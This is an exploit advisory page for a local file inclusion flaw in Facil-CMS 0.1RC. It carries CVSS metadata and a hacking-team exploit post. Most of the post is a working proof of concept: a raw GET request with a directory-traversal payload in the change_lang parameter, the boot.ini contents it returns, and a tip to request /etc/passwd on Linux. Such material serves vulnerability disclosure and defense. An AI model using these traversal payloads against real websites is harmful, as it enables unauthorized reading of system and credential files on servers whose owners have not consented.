Facil-CMS 0.1RC Multiple Local File Inclusion Vulnerabilities

2009-09-08 / 2009-09-09
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22


CVSS Base Score: 6.8/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

======================================================= Facil-CMS 0.1RC Local File Inclusion Vulnerabilities ======================================================= ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground Hacking Team .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' AUTHOR : CWH Underground DATE : 12 June 2008 SITE : www.citec.us ##################################################### APPLICATION : Facil-CMS VERSION : 0.1RC VENDOR : http://facilcms.org/ DOWNLOAD : http://downloads.sourceforge.net/facil-cms ##################################################### +++ Local File Inclusion Exploit +++ ------------- Description ------------- [+]Use Web Proxy (Web Scarab, Burb Proxy, etc...) to intercept GET Method and edit in request data. ----------------------------------------------------- LFI Exploits ----------------------------------------------------- [+]http://[Target]/[Path]/index.php?change_lang=<LFI> [+]http://[Target]/[Path]/modules.php?modload=<LFI> ------------------------------------------ POC (Use WebScarab to Edit request data) ------------------------------------------ [+] GET http://192.168.23.13/facil/index.php?change_lang=../../../../../../../../boot.ini%00 HTTP/1.1 [+] Accept: */* [+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) [+] Host: 192.168.23.13 [+] Cookie: PHPSESSID=e0751800f8e3dca481f3a7369d4a6232 This exploit will open boot.ini in system file: [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1) \WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1) \WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect You can change boot.ini to /etc/passwd%00 in linux OS. ################################################################## # Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos # ##################################################################

References:

http://xforce.iss.net/xforce/xfdb/43037
http://www.securityfocus.com/bid/29692
http://www.milw0rm.com/exploits/5792


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top